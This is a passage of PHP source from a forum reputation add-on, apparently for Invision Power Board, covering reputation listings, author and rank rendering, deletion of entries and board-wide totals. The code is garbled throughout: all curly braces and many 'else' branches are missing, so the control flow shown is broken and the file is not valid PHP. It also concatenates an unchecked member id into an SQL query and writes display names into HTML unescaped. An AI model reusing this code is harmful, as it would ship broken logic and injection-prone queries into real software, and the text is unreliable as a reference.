		        $author['reputation']      = $this->ipsclass->compiled_templates['skin_ahreputation']->reputation_level( $mid, rtrim($author['rep']) );                        

                $this->output .= preg_replace ( "/<!--COMMENT-->/", $info['comment'], $this->ipsclass->compiled_templates['skin_ahreputation']->reputation_row( $author, $info, $css ) );

                unset ($author, $info);

                // Printing footer, printing pagelinks...

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowFooter($back);
                if ( $this->ipsclass->member['g_is_supmod'] )
                     $this->output .= "<br />";
                     $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->mod_panel($this->member['id']);
                if ( $memid !== $this->ipsclass->member['id'] )
               		$this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->qr_links();
                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->Links($links, "");
                $show = "none";
				$sqr = isset($this->ipsclass->member['_cache']['qrep_open']) ? $this->ipsclass->member['_cache']['qrep_open'] : 0;
				if ( $sqr == 1 )
					$show = "show";
                     $info2 = array();
                     $info2['rep_act1']  = ($code == '01') ? "checked='1'" : "";
                     $info2['rep_act2']  = ($code == '02') ? "checked='1'" : "";
                     $info2['rep_add']   = ( $this->rep_cur_power >= 0 )  ? "+".intval ( $this->rep_cur_power )  : intval ( $this->rep_cur_power );
                     $info2['rep_minus'] = ( -$this->rep_cur_power >= 0 ) ? "+".intval ( -$this->rep_cur_power ) : intval ( -$this->rep_cur_power );

                     $info2['level']  = $level; //$this->ipsclass->input['rep_level'];
                     $info2['f']      = $this->ipsclass->input['f'];
                     $info2['t']      = $this->ipsclass->input['t'];
                     $info2['p']      = $this->ipsclass->input['p'];
                     $info2['memid']    = $this->member['id'];
                	 $info2['mem_name'] = $this->member['members_display_name'];
                $this->ipsclass->DB->simple_construct( array ( 'select' => 'sum(weight) as ups',
                                               'from'   => 'reputation',
                                               'where'  => "CODE = '01' AND member_id=".intval($this->ipsclass->input['mid']),
                                               'order'  => 'msg_date DESC' ) );


                $r = $this->ipsclass->DB->fetch_row();

                $info2['ups']   = $r['ups'];
                $info2['downs'] = abs( $level - $info2['ups'] );
                $info2['rep']   = $level;
                $info2['all']   = $this->member['rep_all']." ".$this->ipsclass->lang['rep_votes'];                	 
				if ( $memid !== $this->ipsclass->member['id'] )
					$this->output = str_replace( "<!--IBF.QUICK_REPLY_CLOSED-->", $this->ipsclass->compiled_templates['skin_ahreputation']->quick_reply_box_closed(), $this->output );					
					$this->output = str_replace( "<!--IBF.QUICK_REPLY_OPEN-->"  , $this->ipsclass->compiled_templates['skin_ahreputation']->quick_reply_box_open( $memid, $info2 ), $this->output );                
                $this->nav = array( $this->ipsclass->lang['snav'] );
                $this->page_title = $this->ipsclass->lang['stitle'];

        // Show reputation changes by this member

        function mem_change_stats ( $memid )
                $author_cache = array();

                if (! $this->ipsclass->member['g_access_cp'])
                        $pfix = "AND vis=1";
                        $field = "rep_do_open";
                        $pfix = "";
                        $field = "rep_do";

                $this->ipsclass->input['st'] = intval($this->ipsclass->input['st']);

                $links = $this->ipsclass->build_pagelinks(  array( 'TOTAL_POSS'  => $this->member[ $field ],
                                                        'PER_PAGE'    => $this->ipsclass->vars['rep_per_page'],
                                                        'CUR_ST_VAL'  => intval($this->ipsclass->input['st']),
                                                        'L_SINGLE'    => "",
                                                        'L_MULTI'     => $this->ipsclass->lang['multi_pages'],
                                                        'BASE_URL'    => $this->base_url."autocom=reputation&amp;CODE=04&amp;mid=".$memid,

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->Links($links, "");

                $info = array(
                                 'times' => $this->member[ $field ],
                                 'id'    => $this->member['id'],
                                 'name'  => $this->member['members_display_name'],

                $this->ipsclass->DB->simple_construct( array( 'select' => 'count(*) AS ups',
                                              'from'   => 'reputation',
                                              'where'  => "CODE='01' AND from_id = ".$memid." ".$pfix,
                                                         )                );

                $row = $this->ipsclass->DB->fetch_row();

                $info['ups']   = $row['ups'];
                $info['downs'] = $info['times'] - $info['ups'];
                $info['name']  = "<a href='{$this->base_url}showuser={$info['id']}'>{$info['name']}</a>";

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowSelfTitle( $info );

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowSelfHeader();

                // I told ya what's this is :)

		// Multi PIDS?
		if ( $this->ipsclass->member['is_mod'] )
			$row['pid_start_image'] = $this->ipsclass->compiled_templates['skin_ahreputation']->pid_image($row['msg_id']);
			if ( $this->ipsclass->input['selectedreppids'] )
				if ( strstr( ','.$this->ipsclass->input['selectedreppids'].',', ','.$row['msg_id'].',' ) )
					$row['pid_start_image'] = $this->ipsclass->compiled_templates['skin_ahreputation']->pid_image_selected($row['msg_id']);
				$this->ipsclass->input['selectedreppidcount'] = count( explode( ",", $this->ipsclass->input['selectedreppids'] ) );


                $this->ipsclass->DB->cache_add_query( 'reputation_mem_change_stats',
                                      array( 'mid'   => $memid,
                                             'pfix'  => $pfix,
                                             'st'    => intval($this->ipsclass->input['st']),
                                             'limit' => $this->ipsclass->vars['rep_per_page'],
                                                                ), 'reputation_queries'      );
                $req = $this->ipsclass->DB->simple_exec();

                if (! $this->ipsclass->DB->get_num_rows( $req ) ) $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowNone();

                $post_count = 0;

                while ( $row = $this->ipsclass->DB->fetch_row( $req ) )

                        $info   = $this->parse_stat_info($row);

                        // Still caching...

                        if ( isset($author_cache[ $row['member_id'] ]) and $row['vis'] != 0 )
                             $author = $author_cache[$row['member_id']];
                             $author = $this->parse_stat_author($row, 1);
                             if ( $row['vis'] != 0 )
                                  $author_cache[ $row['member_id'] ] = $author;

                        // Post weight...

                        $row['weight']   = $row['CODE'] == '01'        ? $row['weight'] : -$row['weight'];
                        $author['name'] .= " (".( $row['weight'] >= 0  ? "+" : "").$row['weight'].")";

                        $info['post_css']  = $row['CODE'] == '01' ? 'repgood' : 'repbad';
                        $info['post_css'] .= $row['vis'] == 0     ? 'shaded' : '';
                        $info['post_css'] .= $post_count % 2      ? '1' : '2';

                        $info['memid'] = $memid;

                        $this->output .= preg_replace ( "/<!--COMMENT-->/", $info['comment'], $this->ipsclass->compiled_templates['skin_ahreputation']->ShowRow( $author, $info ) );

                        unset ($author, $info);

                $back = "{$this->base_url}showtopic=".intval($this->ipsclass->input['t']);

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowFooter($back);

                if ( $this->ipsclass->member['g_access_cp'] )
                     $this->output .= "<br />";
                     $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->mod_panel($this->member['id']);

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->Links($links, "");

                $this->nav        = array( $this->ipsclass->lang['snav'] );
                $this->page_title = $this->ipsclass->lang['stitle'];

        // Build reputation post

        function parse_stat_info($row)
                $info = array();

                switch ($row['CODE'])
                        case '01':
                                $info['img'] = $this->ipsclass->vars['img_url']."/r_up.gif";
                        case '02':
                                $info['img'] = $this->ipsclass->vars['img_url']."/r_down.gif";

                // Yeah, I love dat lil' page icon

                $info['new_post'] = "<img src='style_images/<#IMG_DIR#>/to_post_off.gif' alt='post' border='0' style='padding-bottom:2px;' />";

                if ( $info['date'] > $this->ipsclass->member['last_visit'] )
                       $info['new_post'] = "<img src='style_images/<#IMG_DIR#>/to_post.gif' alt='post' border='0' style='padding-bottom:2px;' />";

                $info['date'] = $this->ipsclass->get_date($row['msg_date'], 'LONG');
                $info['message'] 	       = $this->postlib->parser->pre_display_parse( $row['message'] );
				$info['message'] 	       = str_replace("<#IMG_DIR#>", $this->ipsclass->skin['_imagedir'], $row['message']);
				$info['message'] 	       = str_replace("<#EMO_DIR#>", $this->ipsclass->skin['_emodir'], $row['message']);

                // Switch - if rep was changed in topic, in profile or right here

                if ($row['topic_id'] == '0' and $row['extra'] == 'profile')
                        $info['url']   = $this->base_url."showuser=".$row['member_id'] ;
                        $info['title'] = $this->ipsclass->lang['profile'];
                else if ($row['topic_id'] == '0' and $row['extra'] == 'stats')
                        $info['url']   = $this->base_url."autocom=reputation&CODE=03&mid=".$row['member_id']."&t=s";
                        $info['title'] = $this->ipsclass->lang['stats'];
                        $info['title'] = $row['title'];
                        $info['url']   = $this->base_url."showtopic=".$row['topic_id']."&view=findpost&p=".$row['post'];

                        if ( trim($info['title']) == "" )
                                $info['title'] = "<font color='grey'>{$this->ipsclass->lang['no_topic']}</font>";
                                $info['url']   = "#";
                $info['msg_id']  = $row['msg_id'];

                // New style comments
                // Actually I'm too lazy to make new
                // table for them.
                // Seems like theIggs was too lazy for that
                // too (or just more wiser, who knows :)).
                // So I just keepin' all the data serialized

                $row['comment'] = unserialize(stripslashes($row['comment']));

                if ($row['comment']['content'] != '')
                        $info['comment_date'] = $this->ipsclass->get_date($row['comment']['date'], 'LONG');
                        $row['comment']['name_css'] = "normalname";

                        $info['comment'] = $this->ipsclass->compiled_templates['skin_ahreputation']->showcomment($row['msg_id'], $row['comment'], $info['comment_date']);

                // Oh, just got some good point for this:
                // New table could cause more queries :)

                // Buttons (not from topics.php ;))

                // Reply (comment)

                if ($this->ipsclass->member['id'] == $row['member_id'] AND $this->ipsclass->vars['rep_allow_comments'] )
                    $info['reply_button'] = $this->ipsclass->compiled_templates['skin_ahreputation']->button_reply( $row['msg_id'] );
                    $info['reply_button'] = "";

                // Edit

                if ( $this->ipsclass->member['g_is_supmod'] or ($row['from_id'] == $this->ipsclass->member['id'] and $this->ipsclass->member['g_edit_posts']) )
                    $info['edit_button'] = $this->ipsclass->compiled_templates['skin_ahreputation']->button_edit( $row['msg_id'], $row['member_id'] );

                    if ( ($this->ipsclass->member['g_edit_cutoff'] > 0 and $this->ipsclass->member['g_is_supmod'] < 1) and ( $row['msg_date'] <= ( time() - ( intval($this->ipsclass->member['g_edit_cutoff']) * 60 ) ) ) )
                        $info['edit_button'] = "";

                // Delete

                // Multi PIDS?

		if ( $this->ipsclass->member['is_mod'] )
			$info['pid_start_image'] = $this->ipsclass->compiled_templates['skin_ahreputation']->pid_image($row['msg_id']);
            $info['delete_button'] = $this->ipsclass->compiled_templates['skin_ahreputation']->button_delete($row);
			if ( $this->ipsclass->input['selectedreppids'] )
				if ( strstr( ','.$this->ipsclass->input['selectedreppids'].',', ','.$row['msg_id'].',' ) )
					$row['pid_start_image'] = $this->ipsclass->compiled_templates['skin_ahreputation']->pid_image_selected($row['msg_id']);
				$this->ipsclass->input['selectedreppidcount'] = count( explode( ",", $this->ipsclass->input['selectedreppids'] ) );


                return $info;

        // Build reputation post's author info

        function parse_stat_author($row, $by=0)
                $author                    = array();
				// Grab all data...
#				$author = $this->personal_function_load_member( $row['member_id'] );           

                // Author info
                // Getting name of the member that changed rep

                $mid            = $by == 0 ? $row['id'] : $row['id'];
                $author['name'] = $by != 0 ? $this->ipsclass->lang['whom'].": " : '';
                $code           = $by == 0 ? 'CODE=04' : 'CODE=03';
                $author['name_css'] = 'normalname';
    			$author['name'] = $row['members_display_name']; 
 				$group_name     = $this->ipsclass->make_name_formatted( $this->ipsclass->cache['group_cache'][ $row['mgroup'] ]['g_title'], $row['mgroup'] );

                // Ah, anonymous. I'm glad what I'm an admin
                // and I could see them ;)

                if ($row['vis'] != 0)
                     $author['name'] = "<a href='{$this->base_url}autocom=reputation&{$code}&amp;mid={$mid}'>{$row['members_display_name']}</a>" ;
                    $author['name_css'] = 'unreg';

                    if ($this->ipsclass->member['g_access_cp'])
                        $author['name'] = "<a href='{$this->base_url}autocom=reputation&{$code}&amp;mid={$mid}'>{$row['members_display_name']}</a>, ";
                        $author['name'] = "";

                    if ($row['CODE'] == '01' and $this->ipsclass->vars['rep_good_anon'])
                            $author['name'] .= "{$this->ipsclass->vars['rep_good_anon']}";
                    else if ($row['CODE'] == '02' and $this->ipsclass->vars['rep_bad_anon'])
                            $author['name'] .= "{$this->ipsclass->vars['rep_bad_anon']}";
                            $author['name'] .= "{$this->ipsclass->lang['is_anon']}";

                // Oh, no, not anonymous again!

                if ($row['vis'] != 0 or $this->ipsclass->member['g_access_cp'])
                    $author['member_posts']    = $this->ipsclass->compiled_templates['skin_ahreputation']->members_posts( $this->ipsclass->do_number_format( $row['posts'] ) );

                    $author['avatar']          = $this->ipsclass->get_avatar( $row['avatar_location'], $this->ipsclass->member['view_avs'], $row['avatar_size'], $row['avatar_type'] );
					$author['member_joined']   = $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_joined( $this->ipsclass->get_date( $row['joined'], 'JOINED' ) );
					$author['member_group']    = $this->ipsclass->compiled_templates[ 'skin_ahreputation' ]->member_group( $group_name );
					$author['member_number']   = $this->ipsclass->compiled_templates[ 'skin_ahreputation' ]->member_number( $this->ipsclass->do_number_format($row['id']) );
					$author['profile_icon']    = $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_icon_profile( $row['id'] );
					$author['message_icon']    = $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_icon_msg( $row['id'] );
					$author['member_location'] = $row['location'] ? $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_location( $row['location'] ) : '';
					$author['email_icon']      = ! $row['hide_email'] ? $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_icon_email( $row['id'] ) : '';
					$author['addresscard']     = $row['id'] ? $this->ipsclass->compiled_templates[ 'skin_topic' ]->member_icon_vcard( $row['id'] ) : '';

                    if ( $mid )
                        $author['addresscard'] = $this->ipsclass->compiled_templates['skin_ahreputation']->member_icon_vcard( $mid );
                    $author['id'] = $row['member_id'];
					// Thumbie
					if ( ! $row['pp_thumb_photo'] )
						$author['pp_thumb_photo']  = $this->ipsclass->vars['img_url'].'/folder_profile_portal/pp-blank-thumb.png';
						$author['pp_thumb_width']  = 50;
						$author['pp_thumb_height'] = 50;
						$author['pp_thumb_photo'] = $this->ipsclass->vars['upload_url'] . '/' . $row['pp_thumb_photo'];
					// Mini
					$_data = $this->ipsclass->scale_image( array( 'max_height' => 25, 'max_width' => 25, 'cur_width' => $row['pp_thumb_width'], 'cur_height' => $row['pp_thumb_height'] ) );
					$author['pp_mini_photo']  = $author['pp_thumb_photo'];
					$author['pp_mini_width']  = $_data['img_width'];
					$author['pp_mini_height'] = $_data['img_height'];
					// Rating
					$author['_pp_rating_real'] = intval( $row['pp_rating_real'] );                    

                    // Online, offline?
					list( $be_anon, $loggedin ) = explode( '&', $row['login_anonymous'] );    
                    $time_limit = time() - $this->ipsclass->vars['au_cutoff'] * 60;   
					if ( ( $row['last_visit'] > $time_limit or $row['last_activity'] > $time_limit ) AND $be_anon != 1 AND $loggedin == 1 )
						$member['_online'] = 1;
					$author['_pp_online_image'] = $this->ipsclass->compiled_templates['skin_topic']->personal_portal_online_image( $member );

                    $author += $this->build_ranks ( $row );

                    $author['reputation']      = $this->ipsclass->compiled_templates['skin_ahreputation']->reputation_level( $mid, rtrim($author['rep']) );

                return $author;

        // Build pips and reputation ranks

        function build_ranks( $row )
                 $ret  = array();
                 $pips = 0;
                 $pip  = array();
                 $pip['img'] = 0;

                 $ret['title'] = $row['m_title'];

                 // Normal member titles and pips
                 // Guess where did they come from?

                 foreach($this->mem_titles as $k => $v)
                            if ($row['posts'] >= $v['POSTS'])
                                if (!$row['m_title'])
                                     $ret['title'] = $this->mem_titles[ $k ]['TITLE'];

                                $pips = $this->mem_titles[ $k ]['PIPS'];


                 // And this is reputation ranks...

                 foreach($this->rep_mem_titles as $k => $v)
                         if ( ( $row['rep'] >= 0 and $k >= 0 and $row['rep'] >= $k ) or ( $row['rep'] < 0 and $k < 0 and $row['rep'] <= $k ) )
                               if ( !$row['m_title'] )
                                    $ret['title'] = str_replace ( "{title}", $ret['title'], $v );


                 // ... and reputation pips

                 if ( ( $this->ipsclass->vars['rep_rep_pips'] or $this->ipsclass->vars['rep_show_type'] ) and is_array($this->rep_ranks) )
                        foreach($this->rep_ranks as $k => $v)
                                if ( ( $row['rep'] >= 0 and $v['AMOUNT'] >= 0 and $row['rep'] >= $v['AMOUNT'] ) or ( $row['rep'] < 0 and $v['AMOUNT'] < 0 and $row['rep'] <= $v['AMOUNT'] ) )
                                    $pip['title'] = $this->rep_ranks[ $k ]['TITLE'];
                                    $pip['img']   = $this->rep_ranks[ $k ]['PIPS'];
                                    $pip['code']  = $this->rep_ranks[ $k ]['CODE'];


                 // Reputation pips or post pips?

                 if ($this->ipsclass->vars['rep_rep_pips'] and is_array($this->rep_ranks))
                        if ( $pip['img'] )
                             if ( is_numeric( $pip['img'] ) )
                                  $star = $pip['code'] == '01' ? "<{R_STAR_GOOD}>" : "<{R_STAR_BAD}>";

                                  for ($i = 1; $i <= $pip['img']; ++$i)
                                       $ret['member_rank_img'] .= $star;
                                 $ret['member_rank_img'] = $this->ipsclass->compiled_templates['skin_ahreputation']->member_rank_img( 'style_images/<#IMG_DIR#>/folder_team_icons/'.$pip['img'] );
                 // And why I wrote all of this above
                 // if YOU using post related pips?
                        if ( $this->ipsclass->cache['group_cache'][ $row['mgroup'] ]['g_icon'] )
                             $ret['member_rank_img'] = $this->ipsclass->compiled_templates['skin_ahreputation']->member_rank_img($this->ipsclass->cache['group_cache'][ $row['mgroup'] ]['g_icon']);
                        else if ( $pips )
                             if ( is_numeric( $pips ) )
                                for ($i = 1; $i <= $pips; ++$i)
                                        $ret['member_rank_img'] .= "<{A_STAR}>";
                                $ret['member_rank_img'] = $this->ipsclass->compiled_templates['skin_ahreputation']->member_rank_img( 'style_images/<#IMG_DIR#>/folder_team_icons/'.$pips );

                 // Ah, reputation bar!

                 if ( $row['rep'] > $this->ipsclass->vars['rep_max'] )
                      $rep_amount = $this->ipsclass->vars['rep_max'];
                 else if ( $row['rep'] < $this->ipsclass->vars['rep_min'] )
                      $rep_amount = $this->ipsclass->vars['rep_min'];
                      $rep_amount = $row['rep'];

                 if ( $this->ipsclass->vars['rep_level_type'] == 1 )
                             $ret['rep_img']  = "<{REP_";
                             $ret['rep_img'] .= $rep_amount > 0 ? "G_" : "";
                             $ret['rep_img'] .= $rep_amount < 0 ? "B_" : "";
                             $ret['rep_img'] .= abs ( ceil ( $rep_amount / ( ( $rep_amount >= 0 ? $this->ipsclass->vars['rep_max'] : $this->ipsclass->vars['rep_min'] ) / 5 ) ) );
                             $ret['rep_img'] .= "}>";
                 else if ( $this->ipsclass->vars['rep_level_type'] == 2 )
                             $ret['rep_img']  = " ( ".abs ( $rep_amount ? sprintf( "%.0f", ( ($rep_amount / ( $rep_amount >= 0 ? $this->ipsclass->vars['rep_max'] : $this->ipsclass->vars['rep_min'] )) * 100) ) : 0 )."% ";
                             $ret['rep_img'] .= $rep_amount > 0 ? $this->ipsclass->lang['rep_good'] : "";
                             $ret['rep_img'] .= $rep_amount < 0 ? $this->ipsclass->lang['rep_bad'] : "";
                             $ret['rep_img'] .= " ) ";

                 if ( $this->ipsclass->vars['rep_memstats'] and $this->ipsclass->vars['reputation_on'] )
                             if ( strstr( ','.$this->ipsclass->vars['reputation_allowed'].',', ','.$this->ipsclass->member['mgroup'].',' ) and $row['id'] and $this->ipsclass->member['id'] != $row['id'] and $this->ipsclass->member['posts'] >= $this->ipsclass->vars['rep_posts'] )
                                     $ret['rep_add']   = "<a href='{$this->base_url}autocom=reputation&amp;CODE=01&amp;mid={$row['id']}&amp;t=s' title='+'><{REPUTATION_ADD}></a>";
                                     $ret['rep_minus'] = "<a href='{$this->base_url}autocom=reputation&amp;CODE=02&amp;mid={$row['id']}&amp;t=s' title='-'><{REPUTATION_MINUS}></a>";

                 // Lets work on reputation ranks

                 if ( $this->ipsclass->vars['rep_show_type'] > 0 and is_array($this->rep_ranks) )
                         if ( $this->ipsclass->vars['rep_show_type'] == 2 )
                              $ret['rep'] = $pip['title'] != "" ? $pip['title'] : $this->ipsclass->lang['rep_none'];
                             if( ! $row['rep'] )
                                 $row['rep'] = ( $row['rep_all'] == 0 ) ? $this->ipsclass->lang['rep_none'] : "0 {$this->ipsclass->lang['rep_postfix']}";
                                 $row['rep'] .= " {$this->ipsclass->lang['rep_postfix']}";
                             $row['rep']  = trim ($row['rep']);
                             $ret['rep']  = "{$pip['title']} ({$row['rep']})";
                        if( ! $row['rep'] )
                            $ret['rep'] = ( $row['rep_all'] == 0 ) ? $this->ipsclass->lang['rep_none'] : "0 {$this->ipsclass->lang['rep_postfix']}";
                            $ret['rep'] = $row['rep']." {$this->ipsclass->lang['rep_postfix']}";

                 return $ret;

        // Remove reputation entry, admin only

        function delete()
                if (! $this->ipsclass->member['g_access_cp'])
                        $this->ipsclass->Error( array( LEVEL => 1, MSG => 'moderate_no_permission' ) );

				if ( $this->ipsclass->input['selectedreppids'] )
                        $pid = explode (",", $this->ipsclass->input['selectedreppids']);
                        $pid = $this->ipsclass->input['id'];

                $this->do_delete ( $pid );

                $this->ipsclass->print->redirect_screen($this->ipsclass->lang['del_success'], "autocom=reputation&CODE=03&mid=".$this->member['id'] );


        // Remove selected reputation entries

        function do_delete ( $pid )
                $to_member   = array();
                $from_member = array();

			if ( is_array( $pid ) )
				// Better safe than sorry - this should have already been done though
				$pid = $this->ipsclass->clean_int_array( $pid );
				if ( count($pid) > 0 )
					$pids = " IN(".implode(",",$pid).")";
						return FALSE;
				if ( intval($pid) )
					$pids   = "=$pid";
					return FALSE;

                 $this->ipsclass->DB->simple_construct( array( 'select' => '*',
                                              'from'   => 'reputation',
                                              'where'  => "msg_id".$pids,
                                       )                );

                $outer = $this->ipsclass->DB->simple_exec();

                // I dunno, if this helps, just tryin' to reduce queries

                while ( $row = $this->ipsclass->DB->fetch_row ( $outer ) )
                       if ($row['CODE'] == '01')
                           $to_member[$row['member_id']]['rep'] -= $row['weight'];
                           $to_member[$row['member_id']]['rep_all'] -= 1;
                           $to_member[$row['member_id']]['rep'] += $row['weight'];
                           $to_member[$row['member_id']]['rep_all'] -= 1;

                       $from_member[$row['from_id']]['rep_do'] -= 1;
                       if ($row['vis']) $from_member[$row['from_id']]['rep_do_open'] -= 1;

                // You may ask, why are we changing rep by weight
                // and rep_do_* and rep_all only by 1?
                // This is because rep contains total rating
                // and others just contains how many people did that.

                foreach ( $to_member as $k => $v )
                        // Build'em all slowly

                        $query  = 'rep=rep'. ( $v['rep'] >= 0 ? "+".intval($v['rep']) : intval($v['rep']) );
                        $query .= ', rep_all=rep_all'. ( $v['rep_all'] >= 0 ? "+".intval($v['rep_all']) : intval($v['rep_all']) );

                        if ( $from_member[$k]['rep_do'] != 0 )
                             $query .= ', rep_do=rep_do'. ( $from_member[$k]['rep_do'] >= 0 ? "+".intval($from_member[$k]['rep_do']) : intval($from_member[$k]['rep_do']) );
                             $from_member[$k]['rep_do'] = 0;

                        if ( $from_member[$k]['rep_do_open'] != 0 )
                             $query .= ', rep_do_open=rep_do_open'. ( $from_member[$k]['rep_do_open'] >= 0 ? "+".intval($from_member[$k]['rep_do_open']) : intval($from_member[$k]['rep_do']) );
                             $from_member[$k]['rep_do_open'] = 0;

                        // Exe.cute 'em

                        $this->ipsclass->DB->simple_exec_query ( array ( 'update' => 'members', 'set' => $query, 'where' => 'id='.$k ) );

                foreach ( $from_member as $k => $v )
                        $query = 'rep_do=rep_do'. ( $v['rep_do'] >= 0 ? "+".intval($v['rep_do']) : intval($v['rep_do']) );

                        if ( $v['rep_do_open'] != 0 )
                             $query .= ', rep_do_open=rep_do_open'. ( $v['rep_do_open'] >= 0 ? "+".intval($v['rep_do_open']) : intval($v['rep_do']) );

                        $this->ipsclass->DB->simple_exec_query ( array ( 'update' => 'members', 'set' => $query, 'where' => 'id='.$k ) );

                $this->ipsclass->DB->simple_exec_query ( array ( 'delete' => 'reputation', 'where' => 'msg_id'.$pids ) );

        // Showing board overall stats

        function totals()
                $times = 'rep_do';
                if (!$this->ipsclass->member['g_access_cp']) $times .= '_open';

                $sort_key = array( 'name'     => 'sort_by_name',
                                   'rep'      => 'sort_by_rep',
                                   $times     => 'sort_by_rep_changes',

                $max_results = array( 10  => '10',
                                      20  => '20',
                                      30  => '30',
                                      40  => '40',
                                      50  => '50',

                $sort_order = array( 'desc' => 'descending_order',
                                     'asc'  => 'ascending_order',

                if ($this->ipsclass->member['g_mem_info'] != 1)
                        $this->ipsclass->Error( array( 'LEVEL' => 1, 'MSG' => 'no_permission' ) );

                if (isset($this->ipsclass->input['max_results']))
                        $this->max_results = intval($this->ipsclass->input['max_results']);
                        $this->max_results = 30;

                if (isset($this->ipsclass->input['st']))
                        $this->first       = intval($this->ipsclass->input['st']);
                        $this->first       = 0;

                if (isset($this->ipsclass->input['sort_key']))
                        $this->sort_key    = $this->ipsclass->input['sort_key'];
                        $this->sort_key    = 'rep';

                if (isset($this->ipsclass->input['sort_order']))
                        $this->sort_order  = $this->ipsclass->input['sort_order'];
                        $this->sort_order  = 'desc';

                $sort_key_html    = "<select name='sort_key' class='forminput'>\n";
                $max_results_html = "<select name='max_results' class='forminput'>\n";
                $sort_order_html  = "<select name='sort_order' class='forminput'>\n";

                foreach ($sort_order as $k => $v)
                        $sort_order_html .= $k == $this->sort_order ? "<option value='$k' selected>" . $this->ipsclass->lang[ $sort_order[ $k ] ] . "\n"
                                                                                                                : "<option value='$k'>"          . $this->ipsclass->lang[ $sort_order[ $k ] ] . "\n";

                foreach ($sort_key as $k => $v)
                        $sort_key_html .= $k == $this->sort_key ? "<option value='$k' selected>"     . $this->ipsclass->lang[ $sort_key[ $k ] ] . "\n"
                                                                                                        : "<option value='$k'>"              . $this->ipsclass->lang[ $sort_key[ $k ] ] . "\n";

                foreach ($max_results as $k => $v)
                        $max_results_html .= $k == $this->max_results ? "<option value='$k' selected>". $max_results[ $k ] . "\n"
                                                                                                                  : "<option value='$k'>"         . $max_results[ $k ] . "\n";

                $this->ipsclass->lang['sorting_text'] = preg_replace( "/<#SORT_KEY#>/"    , $sort_key_html."</select>"   , $this->ipsclass->lang['sorting_text'] );
                $this->ipsclass->lang['sorting_text'] = preg_replace( "/<#SORT_ORDER#>/"  , $sort_order_html."</select>" , $this->ipsclass->lang['sorting_text'] );
                $this->ipsclass->lang['sorting_text'] = preg_replace( "/<#MAX_RESULTS#>/" , $max_results_html."</select>", $this->ipsclass->lang['sorting_text'] );

                $error = 0;

                if (! isset($sort_key[ $this->sort_key ]) )       $error = 1;
                if (! isset($sort_order[ $this->sort_order ]) )   $error = 1;
                if (! isset($max_results[ $this->max_results ]) ) $error = 1;

                if ($error == 1 )
                        $this->ipsclass->Error( array( LEVEL=> 5, MSG =>'incorrect_use') );

                // Getting new since your last visit

                $new_reps = $this->ipsclass->DB->simple_exec_query( array( 'select' => 'COUNT(DISTINCT(member_id)) AS total_members',
                                                           'from'   => 'reputation',
                                                           'where'  => "msg_date > ".$this->ipsclass->member['last_visit']
                                                                                  )                  );

                if ($new_reps['total_members'] > 0)
                        $new = "<a href='{$this->base_url}autocom=reputation&amp;CODE=getnew'>{$this->ipsclass->lang['new']}</a>";
                        $new = "";

                if ($this->ipsclass->vars['rep_mems_limit'] > 0)
                        $max['total_members'] = $this->ipsclass->vars['rep_mems_limit'];

                        if ($this->first >= $this->ipsclass->vars['rep_mems_limit']) $this->first = 0;

                        if ($this->first + $this->max_results > $this->ipsclass->vars['rep_mems_limit'])
                                $max_results = $this->ipsclass->vars['rep_mems_limit'] - $this->first;
                                $max_results = $this->max_results;

                        $max = $this->ipsclass->DB->simple_exec_query( array( 'select' => 'COUNT(*) AS total_members',
                                                              'from'   => 'members',
                                                              'where'  => "id > 0"
                                                                                 )                );

                        $max_results = $this->max_results;

                $links = $this->ipsclass->build_pagelinks(  array( 'TOTAL_POSS'   => $max['total_members'],
                                                        'PER_PAGE'     => $this->max_results,
                                                        'CUR_ST_VAL'   => $this->first,
                                                        'L_SINGLE'     => "",
                                                        'L_MULTI'      => $this->ipsclass->lang['multi_pages'],
                                                        'BASE_URL'     => $this->base_url."autocom=reputation&amp;CODE=totals&max_results={$this->max_results}&sort_order={$this->sort_order}&sort_key={$this->sort_key}"
                                                                          )                   );

                $this->output = $this->ipsclass->compiled_templates['skin_ahreputation']->Links( $links, $new );

                $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->StatsLinks($this->ipsclass->lang['btitle']);

                // Main list

                $this->ipsclass->DB->simple_construct( array( 'select' => 'members_display_name, posts, mgroup, id, rep, rep_all, allow_rep, allow_anon, '.$times.' AS times',
                                              'from'   => 'members',
                                              'where'  => "id > 0",
                                              'order'  => $this->sort_key." ".$this->sort_order,
                                              'limit'  => array($this->first,$max_results)
                                                         )                );

                $newq = $this->ipsclass->DB->simple_exec();

                while ($row = $this->ipsclass->DB->fetch_row($newq) )
                        unset ($member);

                        $member['name'] = "<a href='{$this->base_url}showuser={$row['id']}'><b>{$row['members_display_name']}</b></a>" ;

                        if ($this->ipsclass->member['g_access_cp'])
                                if (! $row['allow_rep'] )
                                        $member['name'] .= " ".$this->ipsclass->lang['disallow_rep'];
                                        if ($this->ipsclass->vars['rep_allow_anon'])
                                                if ( $row['allow_anon'] and $row['posts'] >= $this->ipsclass->vars['rep_anon_posts'] ) $member['name'] .= " ".$this->ipsclass->lang['allow_anon'];
                                                else $member['name'] .= " ".$this->ipsclass->lang['disallow_anon'];

                        $member += $this->build_ranks( $row );

                        $member['group'] = $this->ipsclass->cache['group_cache'][$row['mgroup']]['g_title'];

                        $member['rep']  .= " <a href='{$this->base_url}autocom=reputation&CODE=03&mid={$row['id']}'>{$this->ipsclass->lang['details']}</a>";

                        if (empty($row['times']))
                            $member['times'] = $this->ipsclass->lang['no_changes'];
                            $member['times'] .= "{$row['times']} {$this->ipsclass->lang['rep_postfix']}".
                                                 " <a href='{$this->base_url}autocom=reputation&amp;CODE=04&amp;mid={$row['id']}'>{$this->ipsclass->lang['details']}</a>";

                        $this->output .= $this->ipsclass->compiled_templates['skin_ahreputation']->ShowTotalsRow($member);

